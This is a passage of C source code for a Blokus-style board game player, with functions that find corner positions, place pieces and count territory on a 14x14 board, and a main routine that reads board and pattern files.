&& (!(strcmp(Board[i-1][j], color) == 0)) && (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if((strcmp(Board[i-1][j-1], color) == 0) || (strcmp(Board[i-1][j+1], color) == 0)){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(j == 0){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j+1], color) == 0))
&& (!(strcmp(Board[i-1][j], color) == 0)) && (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if((strcmp(Board[i+1][j+1], color) == 0) || (strcmp(Board[i-1][j+1], color) == 0)){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(j == 13){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j-1], color) == 0))
&& (!(strcmp(Board[i-1][j], color) == 0)) && (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if(((strcmp(Board[i-1][j-1], color) == 0) || (strcmp(Board[i+1][j-1], color) == 0))){
pass2 = true;
}
else{
pass2 = false;
}
}
else{
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j+1], color) == 0))
&& (!(strcmp(Board[i][j-1], color) == 0)) && (!(strcmp(Board[i-1][j], color) == 0))
&& (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if((strcmp(Board[i+1][j+1], color) == 0) || (strcmp(Board[i-1][j-1], color) == 0)
|| (strcmp(Board[i+1][j-1], color) == 0) || (strcmp(Board[i-1][j+1], color) == 0)){
pass2 = true;
}
else{
pass2 = false;
}
}
isarc = pass1 & pass2;
if(isarc){
k[*n] = i;
t[*n] = j;
*n = *n + 1;
}
}
}
}
void place(int k, int t, int *ini_r, int *end_r, int *ini_c, int *end_c,char Board[ROW][COLUMN][20], char (*puzzle)[PUZRC][PUZRC][20]){
int i,j;
for(i = *ini_r; i < *end_r + 1; i++){
for(j = *ini_c; j < *end_c + 1; j++){
int m = i-*ini_r+k;
int n = j-*ini_c+t;
if(strcmp(Board[m][n], "N") == 0){
strcpy(Board[m][n], (*puzzle)[i][j]);
}
}
}
}
/*void arc_area(String Board[ROW][COLUMN], int *t_arc, int *t_area, String color){
for(i = 0; i < 14; i++){
for(j = 0; j < 14; j++){
if(i == 0 && j == 0){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[m][n+1], color) == 0))
&& ((strcmp(Board[m+1][n+1], color) == 0) || (strcmp(Board[m+1][n+1], color2) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
*t_arc = *t_arc + 1;
*t_area = *t_area +
}
}
}
}
}*/
void arcinfo(char (*puzzle)[PUZRC][PUZRC][20], char Board[ROW][COLUMN][20], int k, int t, int ini_r, int end_r, int ini_c, int end_c,int *opparc_r, int *opparc_c,
int *elmarc_r, int *elmarc_c, int *createarc_r, int *createarc_c, int *opparcnum, int *elmnum, int *createnum, int *oppedgenum,int *dest,bool *creat,
bool *elmin, bool *oppo, String color, String color2){
int i, j;
for(i = ini_r; i < end_r+1; i++){
for(j = ini_c; j < end_c+1; j++){
int m = k+i-ini_r;
int n = t+j-ini_c;
if(strcmp((*puzzle)[i][j], color) == 0){
if(m == 0 && n == 0){
if((i + 1 > end_r) && (j + 1 > end_c)){
if(strcmp(Board[m+1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 0;
*creat = true;
}
}
else if((strcmp(Board[m+1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0)){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if((strcmp(Board[m+1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0)){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m+1][n], color2) == 0) || (strcmp(Board[m][n+1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(m == 0 && n == 13){
if((i + 1 > end_r) && (j - 1 < ini_c)){
if(strcmp(Board[m+1][n-1], "N") == 0){
createarc_r[*createnum] = m + 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 1;
*creat = true;
}
}
else if((strcmp(Board[m+1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0)){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if((strcmp(Board[m+1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0)){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m+1][n], color2) == 0) || (strcmp(Board[m][n-1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(m == 13 && n == 0){
if((i - 1 < ini_r) && (j + 1 > end_c)){
if(strcmp(Board[m-1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 2;
*creat = true;
}
}
else if((strcmp(Board[m-1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0)){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if((strcmp(Board[m-1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0)){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m-1][n], color2) == 0) || (strcmp(Board[m][n+1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(m == 13 && n == 13){
if((i - 1 < ini_r) && (j - 1 < ini_c)){
if(strcmp(Board[m-1][n-1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 3;
*creat = true;
}
}
else if((strcmp(Board[m-1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0)){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if((strcmp(Board[m-1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0)){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m-1][n], color2) == 0) || (strcmp(Board[m][n-1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(m == 0){
if((i + 1 > end_r) && (j + 1 > end_c)){
if(strcmp(Board[m+1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 0;
*creat = true;
}
}
if((i + 1 > end_r) && (j - 1 < ini_c)){
if(strcmp(Board[m+1][n-1], "N") == 0){
createarc_r[*createnum] = m + 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 1;
*creat = true;
}
}
else if(((strcmp(Board[m+1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m+1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if(((strcmp(Board[m+1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m+1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m+1][n], color2) == 0) || (strcmp(Board[m][n+1], color2) == 0)
|| (strcmp(Board[m][n-1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(m == 13){
if((i - 1 < ini_r) && (j + 1 > end_c)){
if(strcmp(Board[m-1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 2;
*creat = true;
}
}
if((i - 1 < ini_r) && (j - 1 < ini_c)){
if(strcmp(Board[m-1][n-1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 3;
*creat = true;
}
}
else if(((strcmp(Board[m-1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if(((strcmp(Board[m-1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m-1][n], color2) == 0) || (strcmp(Board[m][n+1], color2) == 0)
|| (strcmp(Board[m][n-1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(n == 13){
if((i + 1 > end_r) && (j - 1 < ini_c)){
if(strcmp(Board[m+1][n-1], "N") == 0){
createarc_r[*createnum] = m + 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 1;
*creat = true;
}
}
if((i - 1 < ini_r) && (j - 1 < ini_c)){
if(strcmp(Board[m-1][n-1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 3;
*creat = true;
}
}
else if(((strcmp(Board[m+1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if(((strcmp(Board[m+1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m+1][n], color2) == 0) || (strcmp(Board[m-1][n], color2) == 0)
|| (strcmp(Board[m][n-1], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else if(n == 0){
if((i - 1 < ini_r) && (j + 1 > end_c)){
if(strcmp(Board[m-1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 2;
*creat = true;
}
}
if((i + 1 > end_r) && (j + 1 > end_c)){
if(strcmp(Board[m+1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 0;
*creat = true;
}
}
else if(((strcmp(Board[m-1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m+1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if(((strcmp(Board[m-1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m+1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m-1][n], color2) == 0) || (strcmp(Board[m+1][n], color2) == 0)
|| (strcmp(Board[m][n], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
else{
if((i - 1 < ini_r) && (j + 1 > end_c)){
if(strcmp(Board[m-1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 2;
*creat = true;
}
}
if((i - 1 < ini_r) && (j - 1 < ini_c)){
if(strcmp(Board[m-1][n-1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 3;
*creat = true;
}
}
if((i + 1 > end_r) && (j + 1 > end_c)){
if(strcmp(Board[m+1][n+1], "N") == 0){
createarc_r[*createnum] = m - 1;
createarc_c[*createnum] = n + 1;
*createnum = *createnum + 1;
*dest = 0;
*creat = true;
}
}
if((i + 1 > end_r) && (j - 1 < ini_c)){
if(strcmp(Board[m+1][n-1], "N") == 0){
createarc_r[*createnum] = m + 1;
createarc_c[*createnum] = n - 1;
*createnum = *createnum + 1;
*dest = 1;
*creat = true;
}
}
else if(((strcmp(Board[m-1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m+1][n+1], color) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m+1][n-1], color) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
elmarc_r[*elmnum] = m;
elmarc_c[*elmnum] = n;
*elmnum = *elmnum + 1;
*elmin = true;
}
else if(((strcmp(Board[m-1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m-1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m-1][n], "N") == 0))
|| ((strcmp(Board[m+1][n+1], color2) == 0) && (strcmp(Board[m][n+1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))
|| ((strcmp(Board[m+1][n-1], color2) == 0) && (strcmp(Board[m][n-1], "N") == 0) && (strcmp(Board[m+1][n], "N") == 0))){
opparc_r[*opparcnum] = m;
opparc_c[*opparcnum] = n;
*opparcnum = *opparcnum + 1;
*oppo = true;
}
if((strcmp(Board[m-1][n], color2) == 0) || (strcmp(Board[m][n+1], color2) == 0)
|| (strcmp(Board[m][n-1], color2) == 0) || (strcmp(Board[m+1][n], color2) == 0)){
*oppedgenum = *oppedgenum + 1;
}
}
}
}
}
}
void arcarea(char Board[ROW][COLUMN][20], int arc_r, int arc_c, int *area, String selfcolor, String oppcolor){
int i, j;
int partarea = 0;
*area = 0;
if((arc_r - 1 >= 0) && (arc_c - 1 >= 0)){
if(strcmp(Board[arc_r-1][arc_c-1], selfcolor) == 0){
for(i = arc_r; i < 14; i++){
for(j = arc_c; j < 14; j++){
if(i == 13 && j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(i == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
}
}
}
}
if((arc_r - 1 >= 0) && (arc_c + 1 <= 13)){
if(strcmp(Board[arc_r-1][arc_c+1], selfcolor) == 0){
for(i = arc_r; i < 14; i++){
for(j = arc_c; j >= 0; j--){
if(i == 13 && j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(i == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
}
}
if(partarea > *area){
*area = partarea;
}
}
}
if((arc_r + 1 <= 13) && (arc_c - 1 >= 0)){
if(strcmp(Board[arc_r+1][arc_c-1], selfcolor) == 0){
for(i = arc_r; i >= 0; i--){
for(j = arc_c; j < 14; j++){
if(i == 0 && j == 13){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(i == 0){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
}
}
if(partarea > *area){
*area = partarea;
}
}
}
if((arc_r + 1 <= 13) && (arc_c + 1 <= 13)){
if(strcmp(Board[arc_r+1][arc_c+1], selfcolor) == 0){
for(i = arc_r; i >= 0; i--){
for(j = arc_c; j >= 0; j--){
if(i == 0 && j == 0){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(i == 0){
if( (strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else if(j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
partarea = partarea + 1;
}
}
}
}
if(partarea > *area){
*area = partarea;
}
}
}
}
void arcarea2(char Board[ROW][COLUMN][20], int dest, int arc_r, int arc_c, int *area, String selfcolor, String oppcolor){
int i, j;
int partarea = 0;
*area = 0;
if(dest == 0){
for(i = arc_r; i < 14; i++){
for(j = arc_c; j < 14; j++){
if(i == 13 && j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(i == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
}
}
}
else if(dest == 1){
for(i = arc_r; i < 14; i++){
for(j = arc_c; j >= 0; j--){
if(i == 13 && j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(i == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
}
}
}
else if(dest == 2){
for(i = arc_r; i >= 0; i--){
for(j = arc_c; j < 14; j++){
if(i == 0 && j == 13){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(i == 0){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(j == 13){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
}
}
}
else if(dest == 3){
for(i = arc_r; i >= 0; i--){
for(j = arc_c; j >= 0; j--){
if(i == 0 && j == 0){
if((strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(i == 0){
if( (strcmp(Board[i+1][j], selfcolor) == 0) || (strcmp(Board[i][j-1], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else if(j == 0){
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
||(strcmp(Board[i][j+1], selfcolor) == 0) || (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
else{
if((strcmp(Board[i-1][j], selfcolor) == 0) || (strcmp(Board[i+1][j], selfcolor) == 0)
|| (strcmp(Board[i][j-1], selfcolor) == 0) ||(strcmp(Board[i][j+1], selfcolor) == 0)
|| (strcmp(Board[i][j], oppcolor) == 0)){
}
else if(strcmp(Board[i][j], selfcolor) == 0){
break;
}
else{
*area = *area + 1;
}
}
}
}
}
}
void selfarea_1(char (*puzzle)[PUZRC][PUZRC][20], int *area, int ini_r, int ini_c, int end_r, int end_c, String color){
int i, j;
*area = 0;
for(i = ini_r; i < end_r + 1; i++){
for(j = ini_c; j < end_c + 1; j++){
if(strcmp((*puzzle)[PUZRC][PUZRC], color) == 0){
*area = *area + 1;
}
}
}
}
void selfarea_2(int *area, int ini_r, int ini_c, int end_r, int end_c){
*area = (end_r-ini_r+1)*(end_c-ini_c+1);
}
int main(int argc, char *argv[]){
int i, j, m, l, h, e, s, p;
int n;
int k[14] = {0};
int t[14] = {0};
char Board[ROW][COLUMN][20];
int pattern[PUZNUM];
char puzzle[PUZNUM][PUZRC][PUZRC][20];
String color;
String color2;
bool notpass;
if(strcmp(argv[1],"Red") == 0){
color = "R";
}
else{
color = "B";
}
if(strcmp(argv[1],"Red") == 0){
color2 = "B";
}
else{
color2 = "R";
}
String name1 = argv[2];
String name2 = argv[3];
String name3 = argv[4];
char temp[2];
int ini_r, ini_c, end_r, end_c;
bool place_able;
FILE *in1 = fopen(argv[2],"r");
FILE *in2 = fopen(argv[3],"r");
i = 0;
j = 0;
while(fgets(temp, sizeof(temp), in1) != NULL){
if(strcmp(temp, ",") == 0){
}
else if(strcmp(temp, "\n") == 0){
i++;
}
else{
strcpy(Board[i][j], temp);
j++;
if(j == 14){
j = 0;
}
}
}
construct(puzzle,color);
fseek(in2, -43L, SEEK_END);
i = 0;
while(fgets(temp, sizeof(temp), in2) != NULL){
if((strcmp(temp, "1") == 0) || (strcmp(temp, "0") == 0) ){
pattern[i] = atoi(temp);
i++;
}
if(i > 20){
break;
}
}
fclose(in1);
fclose(in2);
if(firstplace(Board)){
